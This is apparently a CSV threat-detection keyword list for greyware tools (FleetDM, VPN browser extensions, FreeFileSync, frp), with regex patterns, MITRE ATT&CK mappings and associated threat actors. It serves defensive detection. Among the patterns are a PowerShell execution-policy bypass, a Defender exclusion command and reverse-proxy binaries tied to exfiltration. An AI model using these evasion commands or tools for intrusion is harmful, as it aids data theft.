"*fleetdeckfork/execfuncargs(*",".{0,1000}fleetdeckfork\/execfuncargs\(.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","N/A","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z"
"*http://localhost:1337*",".{0,1000}http\:\/\/localhost\:1337.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","1","N/A","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z"
"*http://localhost:1337/previewlogin*",".{0,1000}http\:\/\/localhost\:1337\/previewlogin.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","1","N/A","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z"
"*https://fleetdm.com/resources/install-fleetctl.sh*",".{0,1000}https\:\/\/fleetdm\.com\/resources\/install\-fleetctl\.sh.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","1","N/A","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z"
"*npm install fleetctl*",".{0,1000}npm\sinstall\sfleetctl.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","N/A","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z"
"*powershell.exe -ExecutionPolicy Bypass -File cleanup_windows.ps1 -uninstallOrbit*",".{0,1000}powershell\.exe\s\-ExecutionPolicy\sBypass\s\-File\scleanup_windows\.ps1\s\-uninstallOrbit.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","N/A","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z"
"*proceed: *.fleetdeck.io*",".{0,1000}proceed\:\s.{0,1000}\.fleetdeck\.io.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","N/A","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z"
"*egblhcjfjmbjajhjhpmnlekffgaemgfh*",".{0,1000}egblhcjfjmbjajhjhpmnlekffgaemgfh.{0,1000}","greyware_tool_keyword","Fornex VPN","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","N/A","detection in registry","8","10","N/A","N/A","N/A","N/A"
"*gcknhkkoolaabfmlnjonogaaifnjlfnp*",".{0,1000}gcknhkkoolaabfmlnjonogaaifnjlfnp.{0,1000}","greyware_tool_keyword","FoxyProxy Standard","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","N/A","detection in registry","8","10","N/A","N/A","N/A","N/A"
"*dfkdflfgjdajbhocmfjolpjbebdkcjog*",".{0,1000}dfkdflfgjdajbhocmfjolpjbebdkcjog.{0,1000}","greyware_tool_keyword","Free Avira Phantom VPN","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","N/A","detection in registry","8","10","N/A","N/A","N/A","N/A"
"*macdlemfnignjhclfcfichcdhiomgjjb*",".{0,1000}macdlemfnignjhclfcfichcdhiomgjjb.{0,1000}","greyware_tool_keyword","Free Fast VPN","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","N/A","detection in registry","8","10","N/A","N/A","N/A","N/A"
"*inligpkjkhbpifecbdjhmdpcfhnlelja*",".{0,1000}inligpkjkhbpifecbdjhmdpcfhnlelja.{0,1000}","greyware_tool_keyword","Free One Touch VPN","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","N/A","detection in registry","8","10","N/A","N/A","N/A","N/A"
"*dhadilbmmjiooceioladdphemaliiobo*",".{0,1000}dhadilbmmjiooceioladdphemaliiobo.{0,1000}","greyware_tool_keyword","Free Proxy VPN","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","N/A","detection in registry","8","10","N/A","N/A","N/A","N/A"
"*pgfpignfckbloagkfnamnolkeaecfgfh*",".{0,1000}pgfpignfckbloagkfnamnolkeaecfgfh.{0,1000}","greyware_tool_keyword","Free Proxy VPN","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","N/A","detection in registry","8","10","N/A","N/A","N/A","N/A"
"*jpgljfpmoofbmlieejglhonfofmahini*",".{0,1000}jpgljfpmoofbmlieejglhonfofmahini.{0,1000}","greyware_tool_keyword","Free Residential VPN","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","N/A","detection in registry","8","10","N/A","N/A","N/A","N/A"
"*jgbaghohigdbgbolncodkdlpenhcmcge*",".{0,1000}jgbaghohigdbgbolncodkdlpenhcmcge.{0,1000}","greyware_tool_keyword","Free VPN","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","N/A","detection in registry","8","10","N/A","N/A","N/A","N/A"
"*majdfhpaihoncoakbjgbdhglocklcgno*",".{0,1000}majdfhpaihoncoakbjgbdhglocklcgno.{0,1000}","greyware_tool_keyword","Free VPN","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","N/A","detection in registry","8","10","N/A","N/A","N/A","N/A"
"*ifnaibldjfdmaipaddffmgcmekjhiloa*",".{0,1000}ifnaibldjfdmaipaddffmgcmekjhiloa.{0,1000}","greyware_tool_keyword","FREE VPN DEWELOPMENT","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","N/A","detection in registry","8","10","N/A","N/A","N/A","N/A"
"*klnkiajpmpkkkgpgbogmcgfjhdoljacg*",".{0,1000}klnkiajpmpkkkgpgbogmcgfjhdoljacg.{0,1000}","greyware_tool_keyword","Free VPN for Chrome","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","N/A","detection in registry","8","10","N/A","N/A","N/A","N/A"
"*/FreeFileSync.exe*",".{0,1000}\/FreeFileSync\.exe.{0,1000}","greyware_tool_keyword","freefilesync","freefilesync is a backup and file synchronization program abused by attacker for data exfiltration","T1567.002 - T1020 - T1039","TA0010 ","N/A","LockBit","Data Exfiltration","https://freefilesync.org/download.php","1","1","N/A","N/A","9","10","N/A","N/A","N/A","N/A"
"*/FreeFileSync.tar.gz*",".{0,1000}\/FreeFileSync\.tar\.gz.{0,1000}","greyware_tool_keyword","freefilesync","freefilesync is a backup and file synchronization program abused by attacker for data exfiltration","T1567.002 - T1020 - T1039","TA0010 ","N/A","LockBit","Data Exfiltration","https://freefilesync.org/download.php","1","1","N/A","N/A","9","10","N/A","N/A","N/A","N/A"
"*/FreeFileSync_*.tar.gz*",".{0,1000}\/FreeFileSync_.{0,1000}\.tar\.gz.{0,1000}","greyware_tool_keyword","freefilesync","freefilesync is a backup and file synchronization program abused by attacker for data exfiltration","T1567.002 - T1020 - T1039","TA0010 ","N/A","LockBit","Data Exfiltration","https://freefilesync.org/download.php","1","1","N/A","N/A","9","10","N/A","N/A","N/A","N/A"
"*/FreeFileSync_*_Windows_Setup.exe*",".{0,1000}\/FreeFileSync_.{0,1000}_Windows_Setup\.exe.{0,1000}","greyware_tool_keyword","freefilesync","freefilesync is a backup and file synchronization program abused by attacker for data exfiltration","T1567.002 - T1020 - T1039","TA0010 ","N/A","LockBit","Data Exfiltration","https://freefilesync.org/download.php","1","1","N/A","N/A","9","10","N/A","N/A","N/A","N/A"
"*/FreeFileSync_x64.exe*",".{0,1000}\/FreeFileSync_x64\.exe.{0,1000}","greyware_tool_keyword","freefilesync","freefilesync is a backup and file synchronization program abused by attacker for data exfiltration","T1567.002 - T1020 - T1039","TA0010 ","N/A","LockBit","Data Exfiltration","https://freefilesync.org/download.php","1","1","N/A","N/A","9","10","N/A","N/A","N/A","N/A"
"*/FreeFileSyncPortable_*.exe*",".{0,1000}\/FreeFileSyncPortable_.{0,1000}\.exe.{0,1000}","greyware_tool_keyword","freefilesync","freefilesync is a backup and file synchronization program abused by attacker for data exfiltration","T1567.002 - T1020 - T1039","TA0010 ","N/A","LockBit","Data Exfiltration","https://freefilesync.org/download.php","1","1","N/A","N/A","9","10","N/A","N/A","N/A","N/A"
"*/RealTimeSync.exe*",".{0,1000}\/RealTimeSync\.exe.{0,1000}","greyware_tool_keyword","freefilesync","freefilesync is a backup and file synchronization program abused by attacker for data exfiltration","T1567.002 - T1020 - T1039","TA0010 ","N/A","LockBit","Data Exfiltration","https://freefilesync.org/download.php","1","1","N/A","N/A","9","10","N/A","N/A","N/A","N/A"
"*/tmp/FreeFileSync*",".{0,1000}\/tmp\/FreeFileSync.{0,1000}","greyware_tool_keyword","freefilesync","freefilesync is a backup and file synchronization program abused by attacker for data exfiltration","T1567.002 - T1020 - T1039","TA0010 ","N/A","LockBit","Data Exfiltration","https://freefilesync.org/download.php","1","0","N/A","N/A","9","10","N/A","N/A","N/A","N/A"
"*\AppData\Roaming\FreeFileSync\Logs\*",".{0,1000}\\AppData\\Roaming\\FreeFileSync\\Logs\\.{0,1000}","greyware_tool_keyword","freefilesync","freefilesync is a backup and file synchronization program abused by attacker for data exfiltration","T1567.002 - T1020 - T1039","TA0010 ","N/A","LockBit","Data Exfiltration","https://freefilesync.org/download.php","1","0","N/A","N/A","9","10","N/A","N/A","N/A","N/A"
"*\CurrentVersion\Uninstall\FreeFileSync_is1*",".{0,1000}\\CurrentVersion\\Uninstall\\FreeFileSync_is1.{0,1000}","greyware_tool_keyword","freefilesync","freefilesync is a backup and file synchronization program abused by attacker for data exfiltration","T1567.002 - T1020 - T1039","TA0010 ","N/A","LockBit","Data Exfiltration","https://freefilesync.org/download.php","1","0","#registry","N/A","9","10","N/A","N/A","N/A","N/A"
"*\CurrentVersion\Uninstall\FreeFileSync_is1*",".{0,1000}\\CurrentVersion\\Uninstall\\FreeFileSync_is1.{0,1000}","greyware_tool_keyword","freefilesync","freefilesync is a backup and file synchronization program abused by attacker for data exfiltration","T1567.002 - T1020 - T1039","TA0010 ","N/A","LockBit","Data Exfiltration","https://freefilesync.org/download.php","1","0","N/A","N/A","9","10","N/A","N/A","N/A","N/A"
"*\FreeFileSync.exe*",".{0,1000}\\FreeFileSync\.exe.{0,1000}","greyware_tool_keyword","freefilesync","freefilesync is a backup and file synchronization program abused by attacker for data exfiltration","T1567.002 - T1020 - T1039","TA0010 ","N/A","LockBit","Data Exfiltration","https://freefilesync.org/download.php","1","0","N/A","N/A","9","10","N/A","N/A","N/A","N/A"
"*\FreeFileSync\Logs\*",".{0,1000}\\FreeFileSync\\Logs\\.{0,1000}","greyware_tool_keyword","freefilesync","freefilesync is a backup and file synchronization program abused by attacker for data exfiltration","T1567.002 - T1020 - T1039","TA0010 ","N/A","LockBit","Data Exfiltration","https://freefilesync.org/download.php","1","0","N/A","N/A","9","10","N/A","N/A","N/A","N/A"
"*\FreeFileSync_*_Windows_Setup.exe*",".{0,1000}\\FreeFileSync_.{0,1000}_Windows_Setup\.exe.{0,1000}","greyware_tool_keyword","freefilesync","freefilesync is a backup and file synchronization program abused by attacker for data exfiltration","T1567.002 - T1020 - T1039","TA0010 ","N/A","LockBit","Data Exfiltration","https://freefilesync.org/download.php","1","0","N/A","N/A","9","10","N/A","N/A","N/A","N/A"
"*\FreeFileSync_x64.exe*",".{0,1000}\\FreeFileSync_x64\.exe.{0,1000}","greyware_tool_keyword","freefilesync","freefilesync is a backup and file synchronization program abused by attacker for data exfiltration","T1567.002 - T1020 - T1039","TA0010 ","N/A","LockBit","Data Exfiltration","https://freefilesync.org/download.php","1","0","N/A","N/A","9","10","N/A","N/A","N/A","N/A"
"*\FreeFileSyncPortable_*.exe*",".{0,1000}\\FreeFileSyncPortable_.{0,1000}\.exe.{0,1000}","greyware_tool_keyword","freefilesync","freefilesync is a backup and file synchronization program abused by attacker for data exfiltration","T1567.002 - T1020 - T1039","TA0010 ","N/A","LockBit","Data Exfiltration","https://freefilesync.org/download.php","1","0","N/A","N/A","9","10","N/A","N/A","N/A","N/A"
"*\Program Files\FreeFileSync*",".{0,1000}\\Program\sFiles\\FreeFileSync.{0,1000}","greyware_tool_keyword","freefilesync","freefilesync is a backup and file synchronization program abused by attacker for data exfiltration","T1567.002 - T1020 - T1039","TA0010 ","N/A","LockBit","Data Exfiltration","https://freefilesync.org/download.php","1","0","N/A","N/A","9","10","N/A","N/A","N/A","N/A"
"*\RealTimeSync.exe*",".{0,1000}\\RealTimeSync\.exe.{0,1000}","greyware_tool_keyword","freefilesync","freefilesync is a backup and file synchronization program abused by attacker for data exfiltration","T1567.002 - T1020 - T1039","TA0010 ","N/A","LockBit","Data Exfiltration","https://freefilesync.org/download.php","1","0","N/A","N/A","9","10","N/A","N/A","N/A","N/A"
"*\WOW6432Node\FreeFileSync*",".{0,1000}\\WOW6432Node\\FreeFileSync.{0,1000}","greyware_tool_keyword","freefilesync","freefilesync is a backup and file synchronization program abused by attacker for data exfiltration","T1567.002 - T1020 - T1039","TA0010 ","N/A","LockBit","Data Exfiltration","https://freefilesync.org/download.php","1","0","#registry","N/A","9","10","N/A","N/A","N/A","N/A"
"*>FreeFileSync - Folder Comparison and Synchronization<*",".{0,1000}\>FreeFileSync\s\-\sFolder\sComparison\sand\sSynchronization\<.{0,1000}","greyware_tool_keyword","freefilesync","freefilesync is a backup and file synchronization program abused by attacker for data exfiltration","T1567.002 - T1020 - T1039","TA0010 ","N/A","LockBit","Data Exfiltration","https://freefilesync.org/download.php","1","0","#description","N/A","9","10","N/A","N/A","N/A","N/A"
"*>FreeFileSync Setup<*",".{0,1000}\>FreeFileSync\sSetup\<.{0,1000}","greyware_tool_keyword","freefilesync","freefilesync is a backup and file synchronization program abused by attacker for data exfiltration","T1567.002 - T1020 - T1039","TA0010 ","N/A","LockBit","Data Exfiltration","https://freefilesync.org/download.php","1","0","#description","N/A","9","10","N/A","N/A","N/A","N/A"
"*>FreeFileSync<*",".{0,1000}\>FreeFileSync\<.{0,1000}","greyware_tool_keyword","freefilesync","freefilesync is a backup and file synchronization program abused by attacker for data exfiltration","T1567.002 - T1020 - T1039","TA0010 ","N/A","LockBit","Data Exfiltration","https://freefilesync.org/download.php","1","0","#productname","N/A","9","10","N/A","N/A","N/A","N/A"
"*0b0977a047ea3397c83d19f0edeef003c98021a2f64b03503f67a7189aeab4bf*",".{0,1000}0b0977a047ea3397c83d19f0edeef003c98021a2f64b03503f67a7189aeab4bf.{0,1000}","greyware_tool_keyword","freefilesync","freefilesync is a backup and file synchronization program abused by attacker for data exfiltration","T1567.002 - T1020 - T1039","TA0010 ","N/A","LockBit","Data Exfiltration","https://freefilesync.org/download.php","1","0","#filehash","N/A","9","10","N/A","N/A","N/A","N/A"
"*13b6443f4e1f03bc7c37fe9d260435886ad80ee292c0a3b5b9cdeb763576e31b*",".{0,1000}13b6443f4e1f03bc7c37fe9d260435886ad80ee292c0a3b5b9cdeb763576e31b.{0,1000}","greyware_tool_keyword","freefilesync","freefilesync is a backup and file synchronization program abused by attacker for data exfiltration","T1567.002 - T1020 - T1039","TA0010 ","N/A","LockBit","Data Exfiltration","https://freefilesync.org/download.php","1","0","#filehash","N/A","9","10","N/A","N/A","N/A","N/A"
"*api.freefilesync.org*",".{0,1000}api\.freefilesync\.org.{0,1000}","greyware_tool_keyword","freefilesync","freefilesync is a backup and file synchronization program abused by attacker for data exfiltration","T1567.002 - T1020 - T1039","TA0010 ","N/A","LockBit","Data Exfiltration","https://freefilesync.org/download.php","1","1","N/A","N/A","9","10","N/A","N/A","N/A","N/A"
"*c888fa7aadb304362df7bcb43164b6a07222739f5d2a90bf475817aa0e75013d*",".{0,1000}c888fa7aadb304362df7bcb43164b6a07222739f5d2a90bf475817aa0e75013d.{0,1000}","greyware_tool_keyword","freefilesync","freefilesync is a backup and file synchronization program abused by attacker for data exfiltration","T1567.002 - T1020 - T1039","TA0010 ","N/A","LockBit","Data Exfiltration","https://freefilesync.org/download.php","1","0","#filehash","N/A","9","10","N/A","N/A","N/A","N/A"
"*-Command Add-MpPreference -ExclusionProcess *\Program Files\FreeFileSync\Bin\*",".{0,1000}\-Command\sAdd\-MpPreference\s\-ExclusionProcess\s.{0,1000}\\Program\sFiles\\FreeFileSync\\Bin\\.{0,1000}","greyware_tool_keyword","freefilesync","freefilesync is a backup and file synchronization program abused by attacker for data exfiltration","T1567.002 - T1020 - T1039","TA0010 ","N/A","LockBit","Data Exfiltration","https://freefilesync.org/download.php","1","0","N/A","N/A","9","10","N/A","N/A","N/A","N/A"
"*fb4d282f8d202006d682eef84a83757376c20929f62626e288a159d730fde3c9*",".{0,1000}fb4d282f8d202006d682eef84a83757376c20929f62626e288a159d730fde3c9.{0,1000}","greyware_tool_keyword","freefilesync","freefilesync is a backup and file synchronization program abused by attacker for data exfiltration","T1567.002 - T1020 - T1039","TA0010 ","N/A","LockBit","Data Exfiltration","https://freefilesync.org/download.php","1","0","#filehash","N/A","9","10","N/A","N/A","N/A","N/A"
"*https://api.freefilesync.org/new_installation*",".{0,1000}https\:\/\/api\.freefilesync\.org\/new_installation.{0,1000}","greyware_tool_keyword","freefilesync","freefilesync is a backup and file synchronization program abused by attacker for data exfiltration","T1567.002 - T1020 - T1039","TA0010 ","N/A","LockBit","Data Exfiltration","https://freefilesync.org/download.php","1","1","N/A","N/A","9","10","N/A","N/A","N/A","N/A"
"*https://freefilesync.org/donate*",".{0,1000}https\:\/\/freefilesync\.org\/donate.{0,1000}","greyware_tool_keyword","freefilesync","freefilesync is a backup and file synchronization program abused by attacker for data exfiltration","T1567.002 - T1020 - T1039","TA0010 ","N/A","LockBit","Data Exfiltration","https://freefilesync.org/download.php","1","1","N/A","N/A","9","10","N/A","N/A","N/A","N/A"
"*pkill FreeFileSync*",".{0,1000}pkill\sFreeFileSync.{0,1000}","greyware_tool_keyword","freefilesync","freefilesync is a backup and file synchronization program abused by attacker for data exfiltration","T1567.002 - T1020 - T1039","TA0010 ","N/A","LockBit","Data Exfiltration","https://freefilesync.org/download.php","1","0","N/A","N/A","9","10","N/A","N/A","N/A","N/A"
"*pkill RealTimeSync*",".{0,1000}pkill\sRealTimeSync.{0,1000}","greyware_tool_keyword","freefilesync","freefilesync is a backup and file synchronization program abused by attacker for data exfiltration","T1567.002 - T1020 - T1039","TA0010 ","N/A","LockBit","Data Exfiltration","https://freefilesync.org/download.php","1","0","N/A","N/A","9","10","N/A","N/A","N/A","N/A"
"*SOFTWARE\WOW6432Node\FreeFileSync*",".{0,1000}SOFTWARE\\WOW6432Node\\FreeFileSync.{0,1000}","greyware_tool_keyword","freefilesync","freefilesync is a backup and file synchronization program abused by attacker for data exfiltration","T1567.002 - T1020 - T1039","TA0010 ","N/A","LockBit","Data Exfiltration","https://freefilesync.org/download.php","1","0","N/A","N/A","9","10","N/A","N/A","N/A","N/A"
"*/frp.git*",".{0,1000}\/frp\.git.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","1","N/A","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*/frp_0.*.*_darwin_amd64.tar.gz*",".{0,1000}\/frp_0\..{0,1000}\..{0,1000}_darwin_amd64\.tar\.gz.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","1","N/A","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*/frp_0.*.*_darwin_arm64.tar.gz*",".{0,1000}\/frp_0\..{0,1000}\..{0,1000}_darwin_arm64\.tar\.gz.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","1","N/A","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*/frp_0.*.*_freebsd_amd64.tar.gz*",".{0,1000}\/frp_0\..{0,1000}\..{0,1000}_freebsd_amd64\.tar\.gz.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","1","N/A","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*/frp_0.*.*_linux_amd64.tar.gz*",".{0,1000}\/frp_0\..{0,1000}\..{0,1000}_linux_amd64\.tar\.gz.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","1","N/A","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*/frp_0.*.*_linux_arm.tar.gz*",".{0,1000}\/frp_0\..{0,1000}\..{0,1000}_linux_arm\.tar\.gz.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","1","N/A","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*/frp_0.*.*_linux_arm64.tar.gz*",".{0,1000}\/frp_0\..{0,1000}\..{0,1000}_linux_arm64\.tar\.gz.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","1","N/A","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*/frp_0.*.*_linux_mips.tar.gz*",".{0,1000}\/frp_0\..{0,1000}\..{0,1000}_linux_mips\.tar\.gz.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","1","N/A","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*/frp_0.*.*_linux_mips64.tar.gz*",".{0,1000}\/frp_0\..{0,1000}\..{0,1000}_linux_mips64\.tar\.gz.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","1","N/A","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*/frp_0.*.*_linux_mips64le.tar.gz*",".{0,1000}\/frp_0\..{0,1000}\..{0,1000}_linux_mips64le\.tar\.gz.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","1","N/A","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*/frp_0.*.*_linux_mipsle.tar.gz*",".{0,1000}\/frp_0\..{0,1000}\..{0,1000}_linux_mipsle\.tar\.gz.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","1","N/A","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*/frpc.exe*",".{0,1000}\/frpc\.exe.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","1","N/A","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*/frps.exe*",".{0,1000}\/frps\.exe.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","1","N/A","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*\frp_0.*.*_darwin_amd64.tar.gz*",".{0,1000}\\frp_0\..{0,1000}\..{0,1000}_darwin_amd64\.tar\.gz.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","N/A","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*\frp_0.*.*_darwin_arm64.tar.gz*",".{0,1000}\\frp_0\..{0,1000}\..{0,1000}_darwin_arm64\.tar\.gz.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","N/A","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*\frp_0.*.*_freebsd_amd64.tar.gz*",".{0,1000}\\frp_0\..{0,1000}\..{0,1000}_freebsd_amd64\.tar\.gz.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","N/A","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
